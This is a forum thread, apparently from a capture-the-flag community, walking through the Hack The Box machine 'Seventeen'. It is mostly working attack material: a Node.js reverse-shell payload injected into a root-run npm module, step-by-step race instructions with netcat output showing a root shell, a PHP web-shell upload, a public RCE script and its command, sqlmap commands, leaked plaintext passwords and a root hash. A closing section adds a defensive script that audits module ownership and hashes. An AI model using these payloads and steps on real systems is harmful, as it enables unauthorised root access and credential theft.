(May 29, 2022, 10:15 AM) dude4695 Wrote:
> (May 29, 2022, 07:24 AM) z3r0Day Wrote:
>> (May 29, 2022, 06:27 AM) dude4695 Wrote:
>>> for root
>>> better create 2 ssh connections, 1 for running startup.sh and 1 for editing the file
>>> ssh1: sudo /opt/app/startup.sh
>>> ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
>>> and add this function at the top of the file
>>>
>>>     (function(){
>>>         var net = require("net"),
>>>             cp = require("child_process"),
>>>             sh = cp.spawn("bash", []);
>>>         var client = new net.Socket();
>>>         client.connect(PORT, "IP", function(){
>>>             client.pipe(sh.stdin);
>>>             sh.stdout.pipe(client);
>>>             sh.stderr.pipe(client);
>>>         });
>>>         return /a/; // Prevents the Node.js application from crashing
>>>     })();
>>>
>>> you will get this payload from here
>>> https://www.revshells.com/
>>> stop the startup.sh app and run it again, you will get a root shell
>>
>> let me say: you're god, i can't solve it without your help, but please can you explain to me about this path /opt/app/node_modules/loglevel/lib/loglevel.js
>
> check the startup.sh file, there are 2 dependencies: 1 is db-logger and the other 1 is the loglevel npm package. it installs both dependencies, and that script is running as root. i hope u understand

----
> (May 29, 2022, 10:15 AM) dude4695 Wrote:
>> (May 29, 2022, 07:24 AM) z3r0Day Wrote:
>>> (May 29, 2022, 06:27 AM) dude4695 Wrote:
>>> [root instructions, quoted in full above]
>>
>> let me say: you're god, i can't solve it without your help, but please can you explain to me about this path /opt/app/node_modules/loglevel/lib/loglevel.js
>
> check the startup.sh file, there are 2 dependencies: 1 is db-logger and the other 1 is the loglevel npm package. it installs both dependencies, and that script is running as root. i hope u understand

i got you bro

----
> (May 29, 2022, 01:36 AM) ryzen Wrote:
>> (May 28, 2022, 09:24 PM) puni Wrote:
>> https://raw.githubusercontent.com/twseptian/rce-authenticated-from-exploit-db/main/rce-auth.py
>> RCE: python3 rce-auth.py -t http://exam.seventeen.htb/ -u admin -p admin
>> proxychains mysql -u mysqluser -h 172.18.0.1 -p pass mysqlpassword
>
> How did you identify the RCE?

this helped me a lot: https://www.exploit-db.com/exploits/50726

----
I leave the root hash here, I think it can unlock the writeup:

    root:$6$zKJAdLXN$2q2KQQs7CNXr6p.GJAuzESBeX97RB2cdQID4hUUv12CIZvEhCATo8JqsvzVghUlHGVfHXgAuWIVE.GtdVVZPw.:19092:0:99999:7:::

----
> (May 29, 2022, 05:55 AM) dude4695 Wrote:
> http://seventeen.htb:8000/oldmanagement/
> student no.: 31234 password: autodestruction
> and upload a php rev shell file
> http://seventeen.htb:8000/oldmanagement/files/31234/shell.php
> u will get the user Mark's password here
> /var/www/html/employeemanagementsystem/process/dbh.php
> for user kavi's password
> /opt/app/node_modules/db-logger/logger.js
> Here are both user creds
> mark:2020bestyearofmylife kavi:IhateMathematics123#

Oh well, this is stupid. I tried to upload a file endlessly but it just wouldn't work for me.

----
(May 29, 2022, 04:19 PM) Hoze Wrote:
Where is the user.txt file tho?

----
(May 30, 2022, 01:54 AM) Peter Wrote:
> (May 29, 2022, 06:27 AM) dude4695 Wrote:
> [root instructions, quoted in full above]

I can't make it run. The file disappears, no reverse shell, the code to inject vanishes. Any tip or idea, please?

----
> (May 29, 2022, 04:19 PM) Hoze Wrote:
> Where is the user.txt file tho?

Is it a joke 😎 Just need to log on via ssh using Mark's credentials, then you can retrieve it in his home directory:

    mark@seventeen:~$ ls -al
    total 36
    drwxr-x---  5 mark mark 4096 May 11 11:54 .
    drwxr-xr-x  4 root root 4096 Apr  8 19:06 ..
    lrwxrwxrwx  1 mark mark    9 Apr 10 03:17 .bash_history -> /dev/null
    -rw-r--r--  1 mark mark  220 Apr  8 19:06 .bash_logout
    -rw-r--r--  1 mark mark 3771 Apr  8 19:06 .bashrc
    drwx------  2 mark mark 4096 Apr  8 19:26 .cache
    drwx------  3 mark mark 4096 Apr  8 19:26 .gnupg
    drwxrwxr-x 16 mark mark 4096 May 11 16:52 .npm
    -rw-r--r--  1 mark mark  807 Apr  8 19:06 .profile
    -rw-r-----  1 mark mark   33 May 29 15:15 user.txt
    mark@seventeen:~$ cat user.txt
----
> (May 30, 2022, 01:54 AM) Peter Wrote:
>> (May 29, 2022, 06:27 AM) dude4695 Wrote:
>> [root instructions, quoted in full above]
>
> I can't make it run. The file disappears, no reverse shell, the code to inject vanishes. Any tip or idea, please?

You need to do this a little bit faster, else the loglevel directory will be removed. Copy this function to memory (Ctrl+C) and replace the IP and PORT with your own:

    (function(){
        var net = require("net"),
            cp = require("child_process"),
            sh = cp.spawn("bash", []);
        var client = new net.Socket();
        client.connect(4000, "10.10.1X.XX", function(){
            client.pipe(sh.stdin);
            sh.stdout.pipe(client);
            sh.stderr.pipe(client);
        });
        return /a/; // Prevents the Node.js application from crashing
    })();

1. On Terminal 1, open SSH with the kavi user.
2. On Terminal 2, open a second SSH with the kavi user, then prepare your command (but don't launch it yet, because the file does not exist yet): vim /opt/app/node_modules/loglevel/lib/loglevel.js
3. On Terminal 3: nc -lvnp 4000
4. On Terminal 1: sudo /opt/app/startup.sh
5. On Terminal 2: launch the command prepared in step 2 and paste your function at the TOP of the file, then write and exit (with :x it's faster).
6. On Terminal 1: quit and re-run sudo /opt/app/startup.sh
7. On Terminal 3: you can see your reverse shell has been triggered:

    └─$ nc -lvnp 4000
    listening on [any] 4000 ...
    connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
    uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 SSH sessions for steps 4, 5 and 6, that's all. All the explanations from @Dude4695 are enough.

----
(May 30, 2022, 05:05 PM) hacktheboxer Wrote:
> (May 28, 2022, 08:18 PM) Exa Wrote:
> There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
> Using sqlmap, I found a valid login.

Could you show your sqlmap request? I have tried with sqlmap but it fails. My command is 'sqlmap -r sqlmap.txt -p stud_no --level=5 --risk=3', where sqlmap.txt is the POST request to the server.

----
> (May 30, 2022, 05:05 PM) hacktheboxer Wrote:
>> (May 28, 2022, 08:18 PM) Exa Wrote:
>> There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
>> Using sqlmap, I found a valid login.
>
> Could you show your sqlmap request? I have tried with sqlmap but it fails. My command is 'sqlmap -r sqlmap.txt -p stud_no --level=5 --risk=3', where sqlmap.txt is the POST request to the server.

    sqlmap -r r.txt -p stud_no --level 2 --batch

r.txt contains:

    POST /vendor/oldmanagement/ HTTP/1.1
    Host: seventeen.htb
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 36
    Origin: http://seventeen.htb
    Connection: close
    Referer: http://seventeen.htb/vendor/oldmanagement/
    Cookie: PHPSESSID=1gnir2juq0ktu3bhh3j3egvf03
    Upgrade-Insecure-Requests: 1

    stud_no=11111&password=secret&login=
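The root step discussed in this thread works because startup.sh runs under sudo and re-installs its npm dependencies (db-logger and loglevel) into /opt/app/node_modules, a tree the low-privileged kavi user can write to, so anything dropped into loglevel.js between the install and the require is executed as root. As an added example, not posted by anyone in the thread and not part of the box, here is a POSIX shell pre-flight check that a privileged startup script could run before requiring anything: it refuses a module tree that contains files not owned by the expected account or writable by group or others, and it compares the tree against a hash manifest recorded after a trusted install so that a modified file is caught even when permissions look right. The directory and owner names are placeholders; the sample tree in the test is constructed.

```shell
#!/bin/sh
# Added example (not from the thread). Pre-flight checks for a privileged
# Node.js startup script: a root process must not require modules from a
# tree that other accounts can modify. Paths/owners below are placeholders.

# hash_file FILE -> "sha256  path" using whichever tool is available
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi
}

# audit_node_modules DIR OWNER
# Prints every entry under DIR that is not owned by OWNER or that is
# writable by group or others. Returns 1 if anything was found, 0 if clean.
audit_node_modules() {
    dir="$1"
    owner="$2"
    bad=$(find "$dir" \( ! -user "$owner" -o -perm -002 -o -perm -020 \) -print 2>/dev/null)
    if [ -n "$bad" ]; then
        printf '%s\n' "$bad"
        return 1
    fi
    return 0
}

# snapshot_tree DIR -> sorted "hash  path" lines for every regular file.
# Record this once, right after a trusted install, into a root-owned file.
snapshot_tree() {
    find "$1" -type f -print | LC_ALL=C sort | while IFS= read -r f; do
        hash_file "$f"
    done
}

# verify_tree DIR MANIFEST -> 0 if the tree still matches MANIFEST, 1 otherwise
verify_tree() {
    snapshot_tree "$1" | cmp -s - "$2"
}

# preflight DIR OWNER MANIFEST -> 0 only if both checks pass.
# A startup script would call this and refuse to start on a non-zero result:
#   preflight /opt/app/node_modules root /etc/app/node_modules.sha256 || exit 1
preflight() {
    audit_node_modules "$1" "$2" || { echo "refusing: writable or foreign files in $1" >&2; return 1; }
    verify_tree "$1" "$3" || { echo "refusing: $1 differs from manifest $3" >&2; return 1; }
    return 0
}
```

The permission audit catches the setup the thread describes (a dependency tree that a non-root account can edit), and the manifest check catches the case the thread's step 5 exploits, a file changed after installation but before the process starts. Installing dependencies as an unprivileged user into a root-owned, read-only location, then running the application from there, removes the window entirely.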